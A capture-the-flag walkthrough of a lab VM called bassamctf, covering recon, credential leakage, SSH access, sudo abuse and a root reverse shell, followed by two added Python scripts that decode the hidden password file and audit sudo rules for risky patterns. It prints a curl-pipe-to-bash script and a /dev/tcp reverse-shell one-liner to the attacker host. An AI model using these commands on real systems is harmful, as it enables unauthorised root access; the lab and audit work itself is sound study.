bassamctf

1. Information gathering

Start by finding the target on the local network.

 Administrator on  ~/Desktop
 # ipconfig

Windows IP 配置


未知适配器 OpenVPN Wintun:

   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
   连接特定的 DNS 后缀 . . . . . . . :


以太网适配器 Ethernet1:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::e7f5:3c67:3a01:9c17%5
   IPv4 地址 . . . . . . . . . . . . : 192.168.56.104
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . :

未知适配器 OpenVPN TAP-Windows6:

   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
   连接特定的 DNS 后缀 . . . . . . . :

以太网适配器 蓝牙网络连接:

   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
   连接特定的 DNS 后缀 . . . . . . . :

 Administrator on  ~/Desktop
 # nmap -sP 192.168.56.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-08 09:46 中国标准时间
Nmap scan report for 192.168.56.1
Host is up (0.0056s latency).
MAC Address: 0A:00:27:00:00:0B (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.0020s latency).
MAC Address: 08:00:27:BF:4C:5B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.103
Host is up (0.0010s latency).
MAC Address: 08:00:27:74:9B:DE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.105
Host is up (0.0010s latency).
MAC Address: 00:0C:29:EB:98:6D (VMware)
Nmap scan report for 192.168.56.104
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.41 seconds

The host scan shows the target is 192.168.56.105.

Next, a full port scan.

 Administrator on  ~/Desktop
 # nmap -A -p- 192.168.56.105
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-08 09:50 中国标准时间
Nmap scan report for 192.168.56.105
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 5f:cd:98:ac:0e:76:be:d0:9c:ae:23:47:8d:03:b5:07 (RSA)
|   256 f5:cb:de:f0:89:dc:ff:56:89:44:05:3c:a3:44:8f:70 (ECDSA)
|_  256 3a:94:cc:9e:aa:ab:7d:64:71:26:49:48:02:07:62:30 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:EB:98:6D (VMware)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.15 ms 192.168.56.105

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.49 seconds

The scan shows 22/ssh and 80/http open; the system is Ubuntu.

The page on port 80 is empty, but it reveals a site domain name.

Add it to the hosts file:

192.168.56.105 bassam.ctf

Flush the DNS cache from cmd:

ipconfig /flushdns

The page is now reachable.

Fuzz the domain for subdomains; welcome.bassam.ctf turns up (gobuster is unreliable for this: the same wordlist finds nothing with it).

 Administrator on  ~/Desktop
 # ffuf  -c -u http://bassam.ctf/ -w D:\Global\apps\SecLists\2023.2\Discovery\DNS\subdomains-top1million-110000.txt -H "Host: FUZZ.bassam.ctf" -fs 21

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.0.0
________________________________________________

 :: Method           : GET
 :: URL              : http://bassam.ctf/
 :: Wordlist         : FUZZ: D:\Global\apps\SecLists\2023.2\Discovery\DNS\subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.bassam.ctf
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 21
________________________________________________

[Status: 200, Size: 38, Words: 4, Lines: 4, Duration: 13ms]
    * FUZZ: welcome

:: Progress: [114441/114441] :: Job [1/1] :: 293 req/sec :: Duration: [0:05:06] :: Errors: 0 :::

The hint there is of no use, so scan for directories.

 Administrator on  ~/Desktop
 # gobuster dir -u http://welcome.bassam.ctf -w D:\Global\apps\dirbuster\1.0-RC1\directory-list-2.3-small.txt -x .zip,.php,.txt,.html.php.bak
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://welcome.bassam.ctf
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                D:\Global\apps\dirbuster\1.0-RC1\directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              zip,php,txt,html.php.bak
[+] Timeout:                 10s
===============================================================
2023/12/08 11:44:30 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 283]
/.html.php.bak        (Status: 403) [Size: 283]
/index.php            (Status: 200) [Size: 229]
/config.php           (Status: 200) [Size: 0]
/.php                 (Status: 403) [Size: 283]
/.html.php.bak        (Status: 403) [Size: 283]
Progress: 437506 / 438325 (99.81%)
===============================================================
2023/12/08 11:46:03 Finished
===============================================================

Two hits: index.php and config.php. Opening them shows that config.php returns an empty response when accessed directly, while index.php is a file-download page.

Entering config.php as the file name downloads it successfully; inspect the downloaded file.

2. Getting into the system

The file contains a username and password. SSH was found open earlier, so try logging in with them.

Last login: Sun Dec 13 10:38:10 2020 from 192.168.162.128
$ id
uid=1002(test) gid=1002(test) groups=1002(test)
$ uname -a
Linux kira 4.15.0-128-generic #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
$ ls
$ pwd
/home/test
$ pwd
/home/test
$ ls
$ cd ..
$ ls
bassam  kira  test
$ ls -la
total 20
drwxr-xr-x  5 root   root   4096 Dec 13  2020 .
drwxr-xr-x 25 root   root   4096 Dec 13  2020 ..
drwxr-xr-x  2 bassam bassam 4096 Dec 13  2020 bassam
drwxr-xr-x  5 kira   kira   4096 Dec 13  2020 kira
drwxr-xr-x  4 test   test   4096 Dec 13  2020 test
$ cd  bassam
$ ls
down.sh
$ cat   down.sh
curl "http://mywebsite.test/script.sh" |bash

$ cd ..
$ cd kira
$ ls
test.sh
$ cat test.sh
echo 'your name'
read name
echo  $name >/home/kali/message.txt
$1 2>/dev/null

Check sudo privileges, then go back up to the root directory, where a PassProgram folder turns up.

$ sudo -l
[sudo] password for test:
Sorry, user test may not run sudo on kira.

$ cd PassProgram
$ pwd
/PassProgram
$ ls
decoder  encoder
$ pwd
/PassProgram
$ cd ..
$ pwd
/

The test user cannot use sudo on kira.

Back in the test home directory, list all files; there is a hidden bash history file, so read it.

$ cd test
$ ls -la
total 36
drwxr-xr-x 4 test test 4096 Dec  8 05:46 .
drwxr-xr-x 5 root root 4096 Dec 13  2020 ..
-rw------- 1 test test   34 Dec 13  2020 .bash_history
-rw-r--r-- 1 test test  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 test test 3771 Apr  4  2018 .bashrc
drwx------ 2 test test 4096 Dec 13  2020 .cache
drwx------ 3 test test 4096 Dec 13  2020 .gnupg
-rw-r--r-- 1 test test  807 Apr  4  2018 .profile
-rw------- 1 test test  722 Dec  8 05:46 .viminfo
$ cat .bash_history
ls
cat MySecretPassword
clear
ls
$

The history shows a file called MySecretPassword was once read; search for it.

$ find / -type f -name "MySecretPassword"
find: ‘/run/lxcfs’: Permission denied
find: ‘/run/sudo’: Permission denied
find: ‘/run/cryptsetup’: Permission denied
find: ‘/run/lvm’: Permission denied
find: ‘/run/systemd/unit-root’: Permission denied
find: ‘/run/systemd/inaccessible’: Permission denied
find: ‘/run/lock/lvm’: Permission denied
find: ‘/root’: Permission denied
find: ‘/etc/ssl/private’: Permission denied
find: ‘/etc/polkit-1/localauthority’: Permission denied
find: ‘/home/kira/.cache’: Permission denied
find: ‘/home/kira/.gnupg’: Permission denied
find: ‘/home/kira/.local/share’: Permission denied
find: ‘/sys/kernel/debug’: Permission denied
find: ‘/sys/fs/pstore’: Permission denied
find: ‘/sys/fs/fuse/connections/49’: Permission denied
find: ‘/lost+found’: Permission denied
find: ‘/var/spool/rsyslog’: Permission denied
find: ‘/var/spool/cron/atspool’: Permission denied
find: ‘/var/spool/cron/crontabs’: Permission denied
find: ‘/var/spool/cron/atjobs’: Permission denied
/var/www/ctf/MySecretPassword

Go there and look at it.

$ cat   MySecretPassword








$ file MySecretPassword
MySecretPassword: ASCII text
$ hexdump MySecretPassword
0000000 2020 2020 2020 2020 2020 2020 2020 2020
*
0000060 2020 2020 2020 2020 2020 0a20 2020 2020
0000070 2020 2020 2020 2020 2020 2020 2020 2020
*
00000d0 2020 2020 0a20 2020 2020 2020 2020 2020
00000e0 2020 2020 2020 2020 2020 2020 2020 2020
*
0000140 2020 2020 2020 2020 200a 2020 2020 2020
0000150 2020 2020 2020 2020 2020 2020 2020 2020
*
00001a0 2020 2020 2020 2020 2020 200a 2020 2020
00001b0 2020 2020 2020 2020 2020 2020 2020 2020
*
00001d0 2020 2020 2020 2020 2020 2020 0a20 2020
00001e0 2020 2020 2020 2020 2020 2020 2020 2020
*
0000200 2020 2020 2020 2020 2020 2020 2020 200a
0000210 2020 2020 2020 2020 2020 2020 2020 2020
*
0000230 2020 2020 2020 2020 2020 2020 2020 0a20
0000240 2020 2020 2020 2020 2020 2020 2020 2020
*
0000270 2020 0a20
0000274

cat shows nothing, but hexdump shows the file is not empty and has a regular structure, so it is probably encoded. The PassProgram directory found earlier contains a decoder and an encoder, which are probably meant for this file.

$ ls -la
total 48
drwxr-xr-x  2 root root  4096 Dec 13  2020 .
drwxr-xr-x 25 root root  4096 Dec 13  2020 ..
-rwxr-xr-x  1 root root 16864 Dec 13  2020 decoder
-rwxr-xr-x  1 root root 16816 Dec 13  2020 encoder
$ ./decoder
Usage ./decoder <file to decode>
$ ./decoder /var/www/ctf/MySecretPassword
[*] Variables ready to go!
[*] File handled successfully!
[~] WORD: kira2003
[!] DONE

The word is kira2003, probably kira's password.
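The hexdump above is enough to work out the encoding without touching the decoder binary: every line is a run of spaces ended by a newline, and the length of each line is the ASCII code of one hidden character (the first line ends at offset 0x6b, i.e. 107 spaces, and chr(107) is 'k'; the eight line lengths give k, i, r, a, 2, 0, 0, 3, and the total of 0x274 bytes matches). The following Python script is an added example, not code from the writeup or from the VM's decoder; the encoding is inferred from the hexdump, and the sample file it builds is constructed to have the same layout as /var/www/ctf/MySecretPassword. It also shows why a blank `cat` is not evidence of an empty file: a `looks_blank` check on the raw bytes catches space-only content before anyone concludes there is nothing there.

```python
"""Decode a file made only of space-padded lines, where each line's length
is the ASCII code of one hidden character.

Added example, not code from the writeup or the VM's decoder binary. The
encoding is inferred from the hexdump in the writeup: the first line ends
at offset 0x6b (107 spaces, chr(107) == 'k'); the remaining line lengths
give i, r, a, 2, 0, 0, 3, and the file is 0x274 bytes long in total.
"""
import sys


def encode_word(word: str) -> bytes:
    """Build a constructed sample with the same layout as the hexdump:
    one line of ord(ch) spaces per character, each ended by a newline."""
    for ch in word:
        if not 32 <= ord(ch) < 127:
            raise ValueError(f"cannot encode non-printable-ASCII char {ch!r}")
    return b"".join(b" " * ord(ch) + b"\n" for ch in word)


def looks_blank(data: bytes) -> bool:
    """True when the data is non-empty but prints as nothing (only spaces,
    tabs and newlines). `cat` on such a file shows an empty screen, which
    is why the writeup only noticed the content through hexdump."""
    return len(data) > 0 and data.strip(b" \t\r\n") == b""


def decode_whitespace_file(data: bytes) -> str:
    """Return the hidden word, one character per space-only line.

    Raises ValueError if a line holds anything but spaces or its length
    falls outside printable ASCII, so a file that merely happens to look
    blank is not silently turned into garbage."""
    lines = data.split(b"\n")
    if lines and lines[-1] == b"":
        lines.pop()  # drop the empty element after the trailing newline
    chars = []
    for n, line in enumerate(lines, 1):
        if line.strip(b" ") != b"":
            raise ValueError(f"line {n} contains non-space bytes; not this encoding")
        if not 32 <= len(line) < 127:
            raise ValueError(f"line {n} is {len(line)} bytes, outside printable ASCII")
        chars.append(chr(len(line)))
    return "".join(chars)


# Constructed sample reproducing the layout of the hexdump in the writeup.
SAMPLE = encode_word("kira2003")


if __name__ == "__main__":
    # Usage: python decode_ws.py [file]; with no argument, the sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    print(f"{len(data)} bytes, prints as blank: {looks_blank(data)}")
    print("hidden word:", decode_whitespace_file(data))
```

Run it against a real file with `python decode_ws.py /path/to/file`; `wc -c` or `hexdump -C` on the file is the quicker first check that a blank-looking file actually has a size.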

 Administrator on  ~/Desktop
 # ssh kira@192.168.56.105
kira@192.168.56.105's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Dec  8 06:19:16 UTC 2023

  System load:  0.0                Processes:            165
  Usage of /:   21.3% of 19.56GB   Users logged in:      1
  Memory usage: 25%                IP address for ens33: 192.168.56.105
  Swap usage:   0%


258 packages can be updated.
198 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Dec 13 11:57:18 2020
kira@kira:~$
kira@kira:~$ sudo -l
[sudo] password for kira:
Matching Defaults entries for kira on kira:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kira may run the following commands on kira:
    (bassam) /home/kira/test.sh
kira@kira:~$ ls
test.sh

Privilege escalation

kira@kira:~$ sudo -u bassam ./test.sh bash
your name

/home/kira/test.sh: 3: /home/kira/test.sh: cannot create /home/kali/message.txt: Directory nonexistent
ls
test.sh
id
uid=1001(bassam) gid=1001(bassam) groups=1001(bassam)

Now running as bassam; keep looking for a way to escalate further.

cd bassam
ls
down.sh
sudo -l
Matching Defaults entries for bassam on kira:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bassam may run the following commands on kira:
    (root) NOPASSWD: /home/bassam/down.sh
sudo -u root ./down.sh bash
id
uid=1001(bassam) gid=1001(bassam) groups=1001(bassam)
cat down.sh
curl "http://mywebsite.test/script.sh" |bash

down.sh fetches a file with curl and pipes it straight into bash.

cat hosts
127.0.0.1 localhost
127.0.1.1 kira
192.168.56.105 mywebsite.test
# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
/etc/init.d/network restart

3. Privilege escalation to root

Running down.sh through sudo directly asks for bassam's password, but sudo -l shows

User bassam may run the following commands on kira:

(root) NOPASSWD: /home/bassam/down.sh

sudo /home/bassam/down.sh

which needs no password.

On the attacking machine, start Python's HTTP server and create script.sh containing whoami.

./down.sh
bassam
sudo ./dowm.sh
[sudo] password for bassam:
[sudo] password for bassam:
sudo /home/bassam/down.sh
root

Change the contents of script.sh to

sh -i >& /dev/tcp/192.168.56.104/9001 0>&1

Reverse shell

Start a listener on the attacking machine:

nc -lvvp 9001

On the target, run sudo /home/bassam/down.sh

 Administrator on  ~/Desktop
 # nc -lvvp 9001
listening on [any] 9001 ...
connect to [192.168.56.104] from bassam.ctf [192.168.56.105] 44922: unknown socket error
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
down.sh
#
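The whole chain from test to root rests on two sudo rules whose targets are shell scripts: test.sh runs its first argument as a command (`$1 2>/dev/null`), and down.sh pipes whatever `http://mywebsite.test/script.sh` serves into bash, with NOPASSWD as root and the hostname resolved through /etc/hosts. The following Python script is an added example, not part of the original writeup, showing how an administrator can audit sudo rules for exactly these patterns. The rule lines, script bodies and hosts entries in it are constructed to mirror what the writeup shows on the VM; the finding names (`nopasswd-root`, `pipe-to-shell`, `positional-arg-exec`, `hosts-file-resolution`) are this example's own labels.

```python
"""Audit sudo rules that hand a shell script to another user, flagging the
patterns that made the escalation chain in this writeup possible.

Added example, not part of the original writeup. The rules, scripts and
hosts entries below are constructed to mirror what the writeup shows on
the VM (sudo -l output for kira and bassam, test.sh, down.sh, /etc/hosts).
"""
import re
from dataclasses import dataclass

# --- constructed sample input, mirroring the writeup ----------------------
SUDO_RULES = """\
(bassam) /home/kira/test.sh
(root) NOPASSWD: /home/bassam/down.sh
"""

SCRIPTS = {
    "/home/kira/test.sh": (
        "echo 'your name'\n"
        "read name\n"
        "echo  $name >/home/kali/message.txt\n"
        "$1 2>/dev/null\n"
    ),
    "/home/bassam/down.sh": 'curl "http://mywebsite.test/script.sh" |bash\n',
}

HOSTS_FILE = """\
127.0.0.1 localhost
127.0.1.1 kira
192.168.56.105 mywebsite.test
"""

# --- patterns --------------------------------------------------------------
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<nopasswd>NOPASSWD:\s*)?(?P<cmd>\S+)")
# curl/wget output piped into a shell: remote content becomes code
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|da|z)?sh\b")
# a line whose command is a positional parameter ($1, "$@", $*, ...)
POSITIONAL_EXEC_RE = re.compile(r'^\s*"?\$[1-9@*]"?', re.MULTILINE)
EVAL_RE = re.compile(r"\beval\b")
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


@dataclass
class Finding:
    rule: str
    kind: str
    detail: str


def parse_hosts(text: str) -> dict:
    """Map hostnames to addresses from /etc/hosts-style text."""
    mapping = {}
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) >= 2:
            for name in fields[1:]:
                mapping[name] = fields[0]
    return mapping


def audit_rule(rule_line: str, scripts: dict, hosts: dict) -> list:
    """Return findings for one 'sudo -l' style rule line."""
    rule = rule_line.strip()
    m = RULE_RE.match(rule)
    if not m:
        return []
    runas, cmd = m.group("runas"), m.group("cmd")
    nopasswd = bool(m.group("nopasswd"))
    out = []
    if runas == "root" and nopasswd:
        out.append(Finding(rule, "nopasswd-root", f"{cmd} runs as root with no password prompt"))
    body = scripts.get(cmd)
    if body is None:
        out.append(Finding(rule, "target-not-reviewed", f"no contents available for {cmd}"))
        return out
    if PIPE_TO_SHELL_RE.search(body):
        out.append(Finding(rule, "pipe-to-shell", f"{cmd} executes downloaded content as {runas}"))
    if POSITIONAL_EXEC_RE.search(body):
        out.append(Finding(rule, "positional-arg-exec",
                           f"{cmd} runs a caller-supplied argument as a command as {runas}"))
    if EVAL_RE.search(body):
        out.append(Finding(rule, "eval", f"{cmd} uses eval"))
    for host in URL_HOST_RE.findall(body):
        if host in hosts:
            out.append(Finding(rule, "hosts-file-resolution",
                               f"{host} resolves through /etc/hosts to {hosts[host]}; whoever controls "
                               f"that entry or that address controls what runs as {runas}"))
    return out


def audit(rules_text: str, scripts: dict, hosts_text: str) -> list:
    hosts = parse_hosts(hosts_text)
    findings = []
    for line in rules_text.splitlines():
        if line.strip():
            findings.extend(audit_rule(line, scripts, hosts))
    return findings


if __name__ == "__main__":
    for f in audit(SUDO_RULES, SCRIPTS, HOSTS_FILE):
        print(f"[{f.kind}] {f.rule}: {f.detail}")
```

Each finding maps to a fix the writeup makes obvious: a sudo target must not execute its arguments or anything fetched at run time, the script it points to must be root-owned and not writable by the runas user, and the rule should name the exact arguments it permits so the script cannot be repurposed by whoever can reach it.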